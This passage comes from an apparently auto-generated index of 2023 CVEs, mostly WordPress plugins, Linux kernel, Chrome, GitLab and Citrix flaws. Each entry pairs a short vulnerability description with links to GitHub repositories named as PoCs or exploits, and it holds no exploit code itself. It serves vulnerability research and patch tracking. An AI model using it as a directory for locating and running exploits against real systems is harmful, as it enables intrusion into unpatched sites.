secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the `kubernetes.io/enforce-mountable-secrets` annotation are used together with ephemeral containers.\n\n + + +- [Cgv-Dev/Metasploit-Module-TFM](https://github.com/Cgv-Dev/Metasploit-Module-TFM) + +### CVE-2023-2732 (2023-05-25) + +The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. + + +- [RandomRobbieBF/CVE-2023-2732](https://github.com/RandomRobbieBF/CVE-2023-2732) +- [Jenderal92/WP-CVE-2023-2732](https://github.com/Jenderal92/WP-CVE-2023-2732) +- [ThatNotEasy/CVE-2023-2732](https://github.com/ThatNotEasy/CVE-2023-2732) + +### CVE-2023-2744 (2023-06-27) + +The ERP WordPress plugin before 1.12.4 does not properly sanitise and escape the `type` parameter in the `erp/v1/accounting/v1/people` REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. + + +- [pashayogi/CVE-2023-2744](https://github.com/pashayogi/CVE-2023-2744) + +### CVE-2023-2822 (2023-05-20) + +Es wurde eine problematische Schwachstelle in Ellucian Ethos Identity bis 5.10.5 ausgemacht. Hiervon betroffen ist ein unbekannter Codeblock der Datei /cas/logout. Durch Manipulation des Arguments url mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 5.10.6 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [cberman/CVE-2023-2822-demo](https://github.com/cberman/CVE-2023-2822-demo) + +### CVE-2023-2825 (2023-05-26) + +An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups. + + +- [Occamsec/CVE-2023-2825](https://github.com/Occamsec/CVE-2023-2825) +- [yuimarudev/CVE-2023-2825](https://github.com/yuimarudev/CVE-2023-2825) +- [Tornad0007/CVE-2023-2825-Gitlab](https://github.com/Tornad0007/CVE-2023-2825-Gitlab) +- [Rubikcuv5/CVE-2023-2825](https://github.com/Rubikcuv5/CVE-2023-2825) +- [caopengyan/CVE-2023-2825](https://github.com/caopengyan/CVE-2023-2825) +- [cc3305/CVE-2023-2825](https://github.com/cc3305/CVE-2023-2825) +- [alej6/MassCyberCenter-Mentorship-Project-](https://github.com/alej6/MassCyberCenter-Mentorship-Project-) + +### CVE-2023-2833 (2023-06-06) + +The ReviewX plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.6.13 due to insufficient restriction on the 'rx_set_screen_options' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_screen_options[option]' and 'wp_screen_options[value]' parameters during a screen option update. + + +- [Alucard0x1/CVE-2023-2833](https://github.com/Alucard0x1/CVE-2023-2833) + +### CVE-2023-2859 (2023-05-24) + +Code Injection in GitHub repository nilsteampassnet/teampass prior to 3.0.9. + + +- [mnqazi/CVE-2023-2859](https://github.com/mnqazi/CVE-2023-2859) + +### CVE-2023-2868 (2023-05-24) + +A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product effecting versions 5.1.3.001-9.2.0.006. The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product. This issue was fixed as part of BNSF-36456 patch. This patch was automatically applied to all customer appliances. + + +- [cfielding-r7/poc-cve-2023-2868](https://github.com/cfielding-r7/poc-cve-2023-2868) +- [cashapp323232/CVE-2023-2868CVE-2023-2868](https://github.com/cashapp323232/CVE-2023-2868CVE-2023-2868) +- [krmxd/CVE-2023-2868](https://github.com/krmxd/CVE-2023-2868) + +### CVE-2023-2877 (2023-06-27) + +The Formidable Forms WordPress plugin before 6.3.1 does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution. + + +- [RandomRobbieBF/CVE-2023-2877](https://github.com/RandomRobbieBF/CVE-2023-2877) + +### CVE-2023-2916 (2023-08-15) + +The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.11.1 via the 'admin_notice' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including configuration. It can only be exploited if the plugin has not been configured yet. If combined with another arbitrary plugin installation and activation vulnerability, it may be possible to connect a site to InfiniteWP which would make remote management possible and allow for elevation of privileges. + + +- [d0rb/CVE-2023-2916](https://github.com/d0rb/CVE-2023-2916) + +### CVE-2023-2928 (2023-05-27) + +In DedeCMS bis 5.7.106 wurde eine kritische Schwachstelle ausgemacht. Dabei geht es um eine nicht genauer bekannte Funktion der Datei uploads/dede/article_allowurl_edit.php. Durch das Manipulieren des Arguments allurls mit unbekannten Daten kann eine code injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [CN016/DedeCMS-getshell-CVE-2023-2928-](https://github.com/CN016/DedeCMS-getshell-CVE-2023-2928-) + +### CVE-2023-2951 (2023-05-28) + +Es wurde eine kritische Schwachstelle in code-projects Bus Dispatch and Information System 1.0 entdeckt. Es geht dabei um eine nicht klar definierte Funktion der Datei delete_bus.php. Durch die Manipulation des Arguments busid mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [Spr1te76/CVE-2023-2951](https://github.com/Spr1te76/CVE-2023-2951) + +### CVE-2023-2982 (2023-06-29) + +The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5. + + +- [RandomRobbieBF/CVE-2023-2982](https://github.com/RandomRobbieBF/CVE-2023-2982) +- [H4K6/CVE-2023-2982-POC](https://github.com/H4K6/CVE-2023-2982-POC) +- [LoaiEsam37/CVE-2023-2982](https://github.com/LoaiEsam37/CVE-2023-2982) +- [wshinkle/CVE-2023-2982](https://github.com/wshinkle/CVE-2023-2982) + +### CVE-2023-2986 (2023-06-08) + +The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.14.2. This is due to insufficient encryption on the user being supplied during the abandoned cart link decode through the plugin. This allows unauthenticated attackers to log in as users who have abandoned the cart, who are typically customers. Further security hardening was introduced in version 5.15.1 that ensures sites are no longer vulnerable through historical check-out links, and additional hardening was introduced in version 5.15.2 that ensured null key values wouldn't permit the authentication bypass. + + +- [Ayantaker/CVE-2023-2986](https://github.com/Ayantaker/CVE-2023-2986) +- [Alucard0x1/CVE-2023-2986](https://github.com/Alucard0x1/CVE-2023-2986) + +### CVE-2023-3009 (2023-05-31) + +Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9. + + +- [mnqazi/CVE-2023-3009](https://github.com/mnqazi/CVE-2023-3009) + +### CVE-2023-3047 (2023-06-13) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TMT Lockcell allows SQL Injection.This issue affects Lockcell: before 15.\n\n + + +- [Phamchie/CVE-2023-3047](https://github.com/Phamchie/CVE-2023-3047) +- [Kimsovannareth/Phamchie](https://github.com/Kimsovannareth/Phamchie) + +### CVE-2023-3076 (2023-07-10) + +The MStore API WordPress plugin before 3.9.9 does not prevent visitors from creating user accounts with the role of their choice via their wholesale REST API endpoint. This is only exploitable if the site owner paid to access the plugin's pro features. + + +- [im-hanzou/MSAPer](https://github.com/im-hanzou/MSAPer) + +### CVE-2023-3079 (2023-06-05) + +Type confusion in V8 in Google Chrome prior to 114.0.5735.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [mistymntncop/CVE-2023-3079](https://github.com/mistymntncop/CVE-2023-3079) + +### CVE-2023-3124 (2023-06-07) + +The Elementor Pro plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_page_option function in versions up to, and including, 3.11.6. This makes it possible for authenticated attackers with subscriber-level capabilities to update arbitrary site options, which can lead to privilege escalation. + + +- [AmirWhiteHat/CVE-2023-3124](https://github.com/AmirWhiteHat/CVE-2023-3124) + +### CVE-2023-3163 (2023-06-08) + +Es wurde eine problematische Schwachstelle in y_project RuoYi bis 4.7.7 ausgemacht. Es betrifft die Funktion filterKeyword. Mit der Manipulation des Arguments value mit unbekannten Daten kann eine resource consumption-Schwachstelle ausgenutzt werden. + + +- [George0Papasotiriou/CVE-2023-3163-SQL-Injection-Prevention](https://github.com/George0Papasotiriou/CVE-2023-3163-SQL-Injection-Prevention) + +### CVE-2023-3244 (2023-08-17) + +The Comments Like Dislike plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the restore_settings function called via an AJAX action in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to reset the plugin's settings. NOTE: After attempting to contact the developer with no response, and reporting this to the WordPress plugin's team 30 days ago we are disclosing this issue as it still is not updated. + + +- [drnull03/POC-CVE-2023-3244](https://github.com/drnull03/POC-CVE-2023-3244) + +### CVE-2023-3269 (2023-07-11) + +A vulnerability exists in the memory management subsystem of the Linux kernel. The lock handling for accessing and updating virtual memory areas (VMAs) is incorrect, leading to use-after-free problems. This issue can be successfully exploited to execute arbitrary kernel code, escalate containers, and gain root privileges. + + +- [lrh2000/StackRot](https://github.com/lrh2000/StackRot) + +### CVE-2023-3338 (2023-06-30) + +A null pointer dereference flaw was found in the Linux kernel's DECnet networking protocol. This issue could allow a remote user to crash the system. + + +- [TurtleARM/CVE-2023-3338-DECPwn](https://github.com/TurtleARM/CVE-2023-3338-DECPwn) + +### CVE-2023-3390 (2023-06-28) + +A use-after-free vulnerability was found in the Linux kernel's netfilter subsystem in net/netfilter/nf_tables_api.c.\n\nMishandled error handling with NFT_MSG_NEWRULE makes it possible to use a dangling pointer in the same transaction causing a use-after-free vulnerability. This flaw allows a local attacker with user access to cause a privilege escalation issue.\n\nWe recommend upgrading past commit 1240eb93f0616b21c675416516ff3d74798fdc97. + + +- [flygonty/CVE-2023-3390_PoC](https://github.com/flygonty/CVE-2023-3390_PoC) + +### CVE-2023-3450 (2023-06-28) + +Eine kritische Schwachstelle wurde in Ruijie RG-BCR860 2.5.13 gefunden. Dies betrifft einen unbekannten Teil der Komponente Network Diagnostic Page. Durch das Manipulieren mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [yuanjinyuyuyu/CVE-2023-3450](https://github.com/yuanjinyuyuyu/CVE-2023-3450) +- [caopengyan/CVE-2023-3450](https://github.com/caopengyan/CVE-2023-3450) + +### CVE-2023-3452 (2023-08-12) + +The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server. + + +- [leoanggal1/CVE-2023-3452-PoC](https://github.com/leoanggal1/CVE-2023-3452-PoC) + +### CVE-2023-3460 (2023-07-04) + +The Ultimate Member WordPress plugin before 2.6.7 does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild. + + +- [gbrsh/CVE-2023-3460](https://github.com/gbrsh/CVE-2023-3460) +- [rizqimaulanaa/CVE-2023-3460](https://github.com/rizqimaulanaa/CVE-2023-3460) +- [yon3zu/Mass-CVE-2023-3460](https://github.com/yon3zu/Mass-CVE-2023-3460) +- [EmadYaY/CVE-2023-3460](https://github.com/EmadYaY/CVE-2023-3460) +- [diego-tella/CVE-2023-3460](https://github.com/diego-tella/CVE-2023-3460) +- [Rajneeshkarya/CVE-2023-3460](https://github.com/Rajneeshkarya/CVE-2023-3460) +- [DiMarcoSK/CVE-2023-3460_POC](https://github.com/DiMarcoSK/CVE-2023-3460_POC) +- [julienbrs/exploit-CVE-2023-3460](https://github.com/julienbrs/exploit-CVE-2023-3460) +- [TranKuBao/CVE-2023-3460_FIX](https://github.com/TranKuBao/CVE-2023-3460_FIX) + +### CVE-2023-3519 (2023-07-19) + +Unauthenticated remote code execution\n + + +- [telekom-security/cve-2023-3519-citrix-scanner](https://github.com/telekom-security/cve-2023-3519-citrix-scanner) +- [securekomodo/citrixInspector](https://github.com/securekomodo/citrixInspector) +- [mr-r3b00t/CVE-2023-3519](https://github.com/mr-r3b00t/CVE-2023-3519) +- [d0rb/CVE-2023-3519](https://github.com/d0rb/CVE-2023-3519) +- [BishopFox/CVE-2023-3519](https://github.com/BishopFox/CVE-2023-3519) +- [SalehLardhi/CVE-2023-3519](https://github.com/SalehLardhi/CVE-2023-3519) +- [KR0N-SECURITY/CVE-2023-3519](https://github.com/KR0N-SECURITY/CVE-2023-3519) +- [passwa11/CVE-2023-3519](https://github.com/passwa11/CVE-2023-3519) +- [rwincey/cve-2023-3519](https://github.com/rwincey/cve-2023-3519) +- [mandiant/citrix-ioc-scanner-cve-2023-3519](https://github.com/mandiant/citrix-ioc-scanner-cve-2023-3519) +- [Chocapikk/CVE-2023-3519](https://github.com/Chocapikk/CVE-2023-3519) +- [JonaNeidhart/CVE-2023-3519-BackdoorCheck](https://github.com/JonaNeidhart/CVE-2023-3519-BackdoorCheck) +- [Mohammaddvd/CVE-2023-3519](https://github.com/Mohammaddvd/CVE-2023-3519) + +### CVE-2023-3640 (2023-07-24) + +A possible unauthorized memory access flaw was found in the Linux kernel's cpu_entry_area mapping of X86 CPU data to memory, where a user may guess the location of exception stacks or other important data. Based on the previous CVE-2023-0597, the 'Randomize per-cpu entry area' feature was implemented in /arch/x86/mm/cpu_entry_area.c, which works through the init_cea_offsets() function when KASLR is enabled. However, despite this feature, there is still a risk of per-cpu entry area leaks. This issue could allow a local user to gain access to some important data with memory in an expected location and potentially escalate their privileges on the system. + + +- [pray77/CVE-2023-3640](https://github.com/pray77/CVE-2023-3640) + +### CVE-2023-3710 (2023-09-12) + +Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n + + +- [vpxuser/CVE-2023-3710-POC](https://github.com/vpxuser/CVE-2023-3710-POC) + +### CVE-2023-3711 (2023-09-12) + +Session Fixation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Session Credential Falsification through Prediction.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n + + +- [vpxuser/CVE-2023-3711-POC](https://github.com/vpxuser/CVE-2023-3711-POC) + +### CVE-2023-3712 (2023-09-12) + +Files or Directories Accessible to External Parties vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Privilege Escalation.This issue affects PM43 versions prior to P10.19.050004. \n\nUpdate to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n + + +- [vpxuser/CVE-2023-3712-POC](https://github.com/vpxuser/CVE-2023-3712-POC) + +### CVE-2023-3722 (2023-07-19) + +An OS command injection vulnerability was found in the Avaya Aura Device Services Web application which could allow remote code execution as the Web server user via a malicious uploaded file. This issue affects Avaya Aura Device Services version 8.1.4.0 and earlier. + + +- [pizza-power/CVE-2023-3722](https://github.com/pizza-power/CVE-2023-3722) + +### CVE-2023-3824 (2023-08-11) + +In PHP version 8.0.* before 8.0.30,  8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. \n\n + + +- [jhonnybonny/CVE-2023-3824](https://github.com/jhonnybonny/CVE-2023-3824) + +### CVE-2023-3836 (2023-07-22) + +In Dahua Smart Park Management bis 20230713 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /emap/devicePoint_addImgIco?hasSubsystem=true. Durch Manipulation des Arguments upload mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [zh-byte/CVE-2023-3836](https://github.com/zh-byte/CVE-2023-3836) + +### CVE-2023-3881 (2023-07-25) + +In Campcodes Beauty Salon Management System 1.0 wurde eine kritische Schwachstelle entdeckt. Dabei geht es um eine nicht genauer bekannte Funktion der Datei /admin/forgot-password.php. Durch Manipulieren des Arguments contactno mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [AnugiArrawwala/CVE-Research](https://github.com/AnugiArrawwala/CVE-Research) + +### CVE-2023-3897 (2023-07-25) + +\nUsername enumeration is possible through Bypassing CAPTCHA in On-premise SureMDM Solution on Windows deployment allows attacker to enumerate local user information via error message.\n\nThis issue affects SureMDM On-premise: 6.31 and below version \n\n + + +- [jFriedli/CVE-2023-3897](https://github.com/jFriedli/CVE-2023-3897) + +### CVE-2023-3971 (2023-10-04) + +An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise. + + +- [ashangp923/CVE-2023-3971](https://github.com/ashangp923/CVE-2023-3971) + +### CVE-2023-4128 +- [Trinadh465/linux-4.1.15_CVE-2023-4128](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-4128) + +### CVE-2023-4145 (2023-08-03) + +Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/customer-data-framework prior to 3.4.2. + + +- [miguelc49/CVE-2023-4145-2](https://github.com/miguelc49/CVE-2023-4145-2) +- [miguelc49/CVE-2023-4145-1](https://github.com/miguelc49/CVE-2023-4145-1) +- [miguelc49/CVE-2023-4145-3](https://github.com/miguelc49/CVE-2023-4145-3) + +### CVE-2023-4147 (2023-08-07) + +A use-after-free flaw was found in the Linux kernel’s Netfilter functionality when adding a rule with NFTA_RULE_CHAIN_ID. This flaw allows a local user to crash or escalate their privileges on the system. + + +- [murdok1982/Exploit-en-Python-para-CVE-2023-4147](https://github.com/murdok1982/Exploit-en-Python-para-CVE-2023-4147) + +### CVE-2023-4165 (2023-08-05) + +Es wurde eine kritische Schwachstelle in Tongda OA gefunden. Hiervon betroffen ist ein unbekannter Codeblock der Datei general/system/seal_manage/iweboffice/delete_seal.php. Dank der Manipulation des Arguments DELETE_STR mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 11.10 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [mvpyyds/CVE-2023-4165](https://github.com/mvpyyds/CVE-2023-4165) + +### CVE-2023-4166 (2023-08-05) + +In Tongda OA wurde eine kritische Schwachstelle gefunden. Betroffen ist eine unbekannte Verarbeitung der Datei general/system/seal_manage/dianju/delete_log.php. Dank Manipulation des Arguments DELETE_STR mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 11.10 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [mvpyyds/CVE-2023-4166](https://github.com/mvpyyds/CVE-2023-4166) + +### CVE-2023-4169 (2023-08-05) + +In Ruijie RG-EW1200G 1.0(1)B1P5 wurde eine kritische Schwachstelle ausgemacht. Es geht um eine nicht näher bekannte Funktion der Datei /api/sys/set_passwd der Komponente Administrator Password Handler. Durch Manipulation mit unbekannten Daten kann eine improper access controls-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [thedarknessdied/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415](https://github.com/thedarknessdied/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415) + +### CVE-2023-4174 (2023-08-06) + +In mooSocial mooStore 3.1.6 wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Hierbei betrifft es unbekannten Programmcode. Mittels Manipulieren mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. + + +- [d0rb/CVE-2023-4174](https://github.com/d0rb/CVE-2023-4174) + +### CVE-2023-4197 (2023-11-01) + +Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code. + + +- [alien-keric/CVE-2023-4197](https://github.com/alien-keric/CVE-2023-4197) + +### CVE-2023-4206 (2023-09-06) + +A use-after-free vulnerability in the Linux kernel's net/sched: cls_route component can be exploited to achieve local privilege escalation.\n\nWhen route4_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.\n\nWe recommend upgrading past commit b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8.\n\n + + +- [hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208](https://github.com/hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208) + +### CVE-2023-4220 (2023-11-28) + +Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell. + + +- [m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc](https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc) +- [dollarboysushil/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220](https://github.com/dollarboysushil/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220) +- [charlesgargasson/CVE-2023-4220](https://github.com/charlesgargasson/CVE-2023-4220) +- [insomnia-jacob/CVE-2023-4220](https://github.com/insomnia-jacob/CVE-2023-4220) +- [Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit](https://github.com/Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit) +- [HO4XXX/cve-2023-4220-poc](https://github.com/HO4XXX/cve-2023-4220-poc) +- [B1TC0R3/CVE-2023-4220-PoC](https://github.com/B1TC0R3/CVE-2023-4220-PoC) +- [nr4x4/CVE-2023-4220](https://github.com/nr4x4/CVE-2023-4220) +- [Al3xGD/CVE-2023-4220-Exploit](https://github.com/Al3xGD/CVE-2023-4220-Exploit) +- [charchit-subedi/chamilo-lms-unauthenticated-rce-poc](https://github.com/charchit-subedi/chamilo-lms-unauthenticated-rce-poc) +- [LGenAgul/CVE-2023-4220-Proof-of-concept](https://github.com/LGenAgul/CVE-2023-4220-Proof-of-concept) +- [VanishedPeople/CVE-2023-4220](https://github.com/VanishedPeople/CVE-2023-4220) +- [thefizzyfish/CVE-2023-4220_Chamilo_RCE](https://github.com/thefizzyfish/CVE-2023-4220_Chamilo_RCE) +- [qrxnz/CVE-2023-4220](https://github.com/qrxnz/CVE-2023-4220) +- [0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit](https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit) +- [bueno-armando/CVE-2023-4220-RCE](https://github.com/bueno-armando/CVE-2023-4220-RCE) +- [0xDTC/Chamilo-LMS-CVE-2023-4220-Exploit](https://github.com/0xDTC/Chamilo-LMS-CVE-2023-4220-Exploit) +- [H4cking4All/CVE-2023-4220](https://github.com/H4cking4All/CVE-2023-4220) +- [oxapavan/CVE-2023-4220-HTB-PermX](https://github.com/oxapavan/CVE-2023-4220-HTB-PermX) +- [numaan911098/CVE-2023-4220](https://github.com/numaan911098/CVE-2023-4220) +- [MikeyPPPPPPPP/CVE-2023-4220](https://github.com/MikeyPPPPPPPP/CVE-2023-4220) +- [Pr1or95/CVE-2023-4220-exploit](https://github.com/Pr1or95/CVE-2023-4220-exploit) + +### CVE-2023-4226 (2023-11-28) + +Unrestricted file upload in `/main/inc/ajax/work.ajax.php` in Chamilo LMS <= v1.11.24 allows authenticated attackers with learner role to obtain remote code execution via uploading of PHP files. + + +- [krishnan-tech/CVE-2023-4226-POC](https://github.com/krishnan-tech/CVE-2023-4226-POC) + +### CVE-2023-4278 (2023-09-11) + +The MasterStudy LMS WordPress Plugin WordPress plugin before 3.0.18 does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and/or posts. + + +- [revan-ar/CVE-2023-4278](https://github.com/revan-ar/CVE-2023-4278) + +### CVE-2023-4279 (2023-09-04) + +This User Activity Log WordPress plugin before 1.6.7 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic. + + +- [b0marek/CVE-2023-4279](https://github.com/b0marek/CVE-2023-4279) + +### CVE-2023-4281 (2023-09-25) + +This Activity Log WordPress plugin before 2.8.8 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic. + + +- [b0marek/CVE-2023-4281](https://github.com/b0marek/CVE-2023-4281) + +### CVE-2023-4294 (2023-09-11) + +The URL Shortify WordPress plugin before 1.7.6 does not properly escape the value of the referer header, thus allowing an unauthenticated attacker to inject malicious javascript that will trigger in the plugins admin panel with statistics of the created short link. + + +- [b0marek/CVE-2023-4294](https://github.com/b0marek/CVE-2023-4294) + +### CVE-2023-4300 (2023-09-25) + +The Import XML and RSS Feeds WordPress plugin before 2.1.4 does not filter file extensions for uploaded files, allowing an attacker to upload a malicious PHP file, leading to Remote Code Execution. + + +- [bde574786/CVE-2023-4300](https://github.com/bde574786/CVE-2023-4300) + +### CVE-2023-4357 (2023-08-15) + +Insufficient validation of untrusted input in XML in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to bypass file access restrictions via a crafted HTML page. (Chromium security severity: Medium) + + +- [xcanwin/CVE-2023-4357-Chrome-XXE](https://github.com/xcanwin/CVE-2023-4357-Chrome-XXE) +- [OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation](https://github.com/OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation) +- [passwa11/CVE-2023-4357-APT-Style-exploitation](https://github.com/passwa11/CVE-2023-4357-APT-Style-exploitation) +- [sunu11/chrome-CVE-2023-4357](https://github.com/sunu11/chrome-CVE-2023-4357) +- [WinnieZy/CVE-2023-4357](https://github.com/WinnieZy/CVE-2023-4357) +- [lon5948/CVE-2023-4357-Exploitation](https://github.com/lon5948/CVE-2023-4357-Exploitation) +- [CamillaFranceschini/CVE-2023-4357](https://github.com/CamillaFranceschini/CVE-2023-4357) + +### CVE-2023-4427 (2023-08-22) + +Out of bounds memory access in V8 in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) + + +- [tianstcht/CVE-2023-4427](https://github.com/tianstcht/CVE-2023-4427) + +### CVE-2023-4450 (2023-08-21) + +In jeecgboot JimuReport bis 1.6.0 wurde eine kritische Schwachstelle ausgemacht. Das betrifft eine unbekannte Funktionalität der Komponente Template Handler. Durch Manipulation mit unbekannten Daten kann eine injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 1.6.1 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [ilikeoyt/CVE-2023-4450-Attack](https://github.com/ilikeoyt/CVE-2023-4450-Attack) + +### CVE-2023-4460 (2023-12-04) + +The Uploading SVG, WEBP and ICO files WordPress plugin through 1.2.1 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads. + + +- [0xn4d/poc-cve-xss-uploading-svg](https://github.com/0xn4d/poc-cve-xss-uploading-svg) + +### CVE-2023-4542 (2023-08-25) + +Es wurde eine Schwachstelle in D-Link DAR-8000-10 bis 20230809 ausgemacht. Sie wurde als kritisch eingestuft. Es geht dabei um eine nicht klar definierte Funktion der Datei /app/sys1.php. Durch das Manipulieren des Arguments cmd mit der Eingabe id mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [PumpkinBridge/CVE-2023-4542](https://github.com/PumpkinBridge/CVE-2023-4542) + +### CVE-2023-4549 (2023-09-25) + +The DoLogin Security WordPress plugin before 3.7 does not properly sanitize IP addresses coming from the X-Forwarded-For header, which can be used by attackers to conduct Stored XSS attacks via WordPress' login form. + + +- [b0marek/CVE-2023-4549](https://github.com/b0marek/CVE-2023-4549) + +### CVE-2023-4568 (2023-09-13) + +PaperCut NG allows for 